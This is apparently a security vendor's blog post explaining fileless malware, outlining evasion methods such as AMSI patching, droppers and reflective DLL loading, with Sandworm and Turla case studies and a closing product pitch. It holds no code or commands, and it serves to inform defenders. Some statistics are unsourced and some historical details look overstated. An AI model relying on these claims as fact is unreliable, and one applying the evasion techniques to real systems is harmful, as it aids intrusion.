Skip to main content

Current cyber solutions focus on (and are limited to) file-based malware. So, over the past few years, attackers have shifted to a stealthier, more evasive approach- embedding their malicious code within a program’s active memory.  There is no download, no trace on the filesystem, no recognizable signature or behavior for traditional solutions to detect. This allows attackers to hide in plain sight, disguised to the defender as normal, benign activity.

For a long time, fileless techniques were the domain of nation-states, requiring large teams and endless resources to support the development of this highly sophisticated software. However, as more and more exploits have been leaked, and more malware has been reverse-engineered, fileless techniques have become the staple of modern cyberattacks, increasing by 1400% since 2022.  The current estimate is that 91% of ransomware samples use some kind of fileless component. And they’re affordable, with variants like XWorm and Bunny Loader available on the dark web for a few hundred dollars apiece.

There are many in-depth fileless resources available online, notably Alex Adomov’s lecture at VB 2023 illustrating the core aspects of these devastating attacks. Here, though, is a brief overview of their history, current and future impact.

Anatomy of a Fileless Attack

Fileless Attack Types [1]

Fileless attacks can be broken down into three types.

  • Type One — There is no file trace on the Operating System. Malware behavior is limited to the process memory space and does not interact with outside components. A common example of this is a PowerShell remote exploitation attack. In this case, a dropper is used to download an obfuscated and encoded DLL which is loaded and executed completely in PowerShell process memory.
  • Type Two — Malware does not write files to the disk but, some files may be used indirectly. For example, saving malicious code to the registry is a common practice for establishing malware persistence. Even though no file is created on the system, the registry still establishes a footprint that can be traced by the defender.
  • Type Three — Malware requires some sort of file footprint to establish execution and persistence. For example, by creating a new task in the task scheduler or requiring a macro in a Word document to establish initial access, files can still assist the kill chain even though the actual malicious payload may not reside within the file itself.\

A majority of attackers use Types Two and Three to establish initial access and persistence while the payload itself will reside within a PowerShell or JavaScript script.

Defense Evasion (MITRE TTP TA005)

Traditional defenses are great at what they were designed to do: scanning for the known patterns and signatures of previously observed malware. What makes fileless attacks so dangerous is their ability to circumvent everything traditional solutions know to do. These are some of the fileless techniques currently used to bypass and disable existing protections.

  • AMSI Bypass — The anti-malware scanning interface (AMSI) in newer versions of Windows allows AVs to scan executables and commands before they are run. Its DLL acts as an intermediary, iterating through every AV’s scan function to determine a file is not malicious. However, by patching the AMSI DLL code in runtime memory, attackers can effectively override the scanning process, disabling any existing cybersecurity solution’s ability to scan for malware.
  • Remote Execution (Droppers) — AVs scan files and data structures in the filesystem for indicators of malware. However, modern fileless malware leverages remote execution to limit malicious code’s exposure to the target system. By leveraging a component called a dropper, attackers can insert a piece of stub code on the target system to disable existing protections before downloading the malicious code from a remote server. Since the downloaded code will be loaded and executed from the dropper or another benign program, no footprint will exist for scanners to detect.
  • Obfuscation/Encryption — Most modern AI scanning models rely on plain text patterns to detect malicious activity. This allows attackers to leverage obfuscating commands, key data encryption, and even something as simple as changing the name of a function to bypass traditional solutions.
  • Reflective Code Loading — A common PowerShell technique is to load a DLL into memory to execute. Often times, this is combined with a dropper to download an encoded DLL, and then load into the current memory context to execute. Currently, MITRE only recommends monitoring for this command as a mitigation, leading to high false positive rates for monitoring solutions

Example 1: Sandworm APT

Sandworm is an element within the Russian intelligence service that is dedicated to executing the Kremlin’s most high-profile hacking efforts, often directed at their target’s critical infrastructure.

Russian Government Associated APTs [1]

Some of the most devastating cyber-attacks in history have been spun out of the Sandworm group, mainly due to the utilization of fileless components. For example:

  1. Black Energy (2015) — A trojan developed to establish a DDOS capability within the Ukrainian energy sector infrastructure. Malware was initially launched through spear phished excel documents with an embedded macro which launched a PowerShell dropper. The attack left 230,000 residents without power and 2 of 3 distribution centers.
  2. Industroyer (2016) — Malware was spread throughout Industrial Control System (ICS) substations, completely opening every circuit and causing power stations to explode. This attack leveraged a combination of macros and remote execution for initial infection alongside a data wiper to remove traces of itself. This attack caused thousands of homes in Ukraine to lose power.
  3. NotPetya (2017) — Was the most damaging attack for its time, causing over $10 Billion in damages. Intended for Ukrainian government facilities, the worm quickly spread throughout the globe, notably effecting Maersk, one of the world’s largest shipping distributors, and Merck Pharmaceuticals, in addition to multiple hospitals and banks. Remote execution and obfuscated fileless droppers were leveraged for the initial infection.
  4. Olympic Destroyer (2018) — This attack intended to wipe out the Winter Olympics’ digital infrastructure during  Opening Ceremonies. Fortunately, the attack had little effect on the games, but a post mortem analysis found several sophisticated evasion techniques including polymorphic mutation, data wiping, and leveraging of the NSA’s leaked Eternal Romance exploit.
  5. WhisperGate (2022) — Deployed to destroy Ukrainian government systems during initial Russian hostilities. Similar to NotPetya, attackers successfully vandalized over 80 Ukrainian government websites.

As an exemplar for the anatomy of a Sandworm fileless attack, let’s take a closer look at the WhisperGate attack.

WhisperGate Overview [1]

As seen above, WhisperGate malware can be broken down into two stages. Stage One uses the MBR utility to wipe the disk while, in Stage Two, a dropper is used to download the File wiper malware to PowerShell (where it is subsequently executed within memory).

Whispergate Attack Stage 2 Process [1]

In the attack process diagram for the Stage Two, the dropper stub code downloads an image from a Discord CDN server. However, this image is an obfuscated .Net DLL which is storing the respective malware. At this point, the .Net DLL is injected into a benign Windows utility named InstallUtil.exe where Process Hollowing is leveraged to embed the malware within the program.

Reflective Loading [1]

Once the DLL is loaded into memory, reflective loading is used to filelessly execute the respective malware without filesystem interaction. Then, because the initial payloads were disguised as images, downloaded remotely, and executed within benign processes, the attackers are able to bypass state-of-the-art commercial protections running on the systems.

Example 2: Turla APT

Turla APT, linked to the Russian Federal Security Service (FSB), has been active since at least 2004, targeting several high-profile government and defense organizations around the world, including:

  1. US Central Command (2008)
  2. Finnish Ministry of Foreign Affairs  (2013)
  3. Swiss defense contractor RUAG (2014–2016)
  4. German Bundestag  (2017–2018)

Similar to some of the Sandworm attacks, Turla leveraged spear phishing to gain entry into target systems disguised as Excel documents (but were also embedded with dropper macros).

Turla Spear Phishing Email Attachment [1]

In the second stage, this approach leveraged JavaScript code to download and invoke the eventual payload.

Turla Invoking Backdoor Payload [1]

Finally, the payload was downloaded as an obfuscated .Net payload and executed within PowerShell process memory using the same reflection technique leveraged by Sandworm.

Turla .Net Reflection for PayloadExecution [1]

This resulted in a backdoor to the attacker command and control server, allowing for future interactions with the target system.

Turla Backdoor Execution [1]

Fileless Threats are Everywhere

It is critical to note how capable fileless attacks are at expanding beyond their initial targets. NotPetya was intended for the Ukrainian government, but organizations around the world were heavily compromised. Increasingly, hospitals, banks, schools and other services suffer the brunt of collateral damage. And while Sandworm and Turla are nation-state backed actors, it is crucial to understand that now even unsophisticated attackers have access to the same set of tools that once required a hostile nation’s cyber A-team.

Due to leaks, increased education and awareness, and open-source tools, fileless attack techniques have been trickling steadily onto the dark web, allowing cyber criminals to execute complex attacks at a fraction of the cost.  Assisted by generative AI tools like WormGPT (ChatGPT for cyber-attacks),defense evasion and long term persistence-without-detection are easier now than they have ever been.

Unlike hostile nations, criminals aren’t usually trying to accomplish a political agenda.  They’re out to inflict maximum damage on a target that is likely to pay.  Healthcare, financial, entertainment, transportation, manufacturing, education – the industry itself doesn’t matter. And whether it is the Rhysidia attack which shut down 17 hospitals and 111 clinics, the Mr. Cooper attack which affected over four million customers, or the Caesar’s/MGM Casino attack which shut down operations for a week and a half, victims are faced with a simple but unthinkable choice: give in or watch their organizations burn to the ground.

The reactive nature of traditional solutions means that organizations must wait for an attack to occur before taking action, scanning for known signatures instead of proactively mitigating malicious activity. By continuously evolving and incorporating fileless techniques, attackers are able to stay one step ahead and maximize their criminal gain. Until defenders are equipped to stop attacks that leave no trace, fileless malware will continue its exponential growth.

How Arms Cyber can help

The Arms Cyber ransomware solution employs a comprehensive, multilayered defense-in-depth approach that combats ransomware at every stage of execution. Utilizing a mix of cutting-edge strategies, traditional defenses are transformed into a moving maze, designed to disorient and effectively disrupt even the most advanced attackers. From initial intrusion, through attempts at evasion, to malicious payload execution, Arms  Cyber identifies and neutralizes ransomware threats earlier and more effectively compared to signature-based and behavioral methodologies.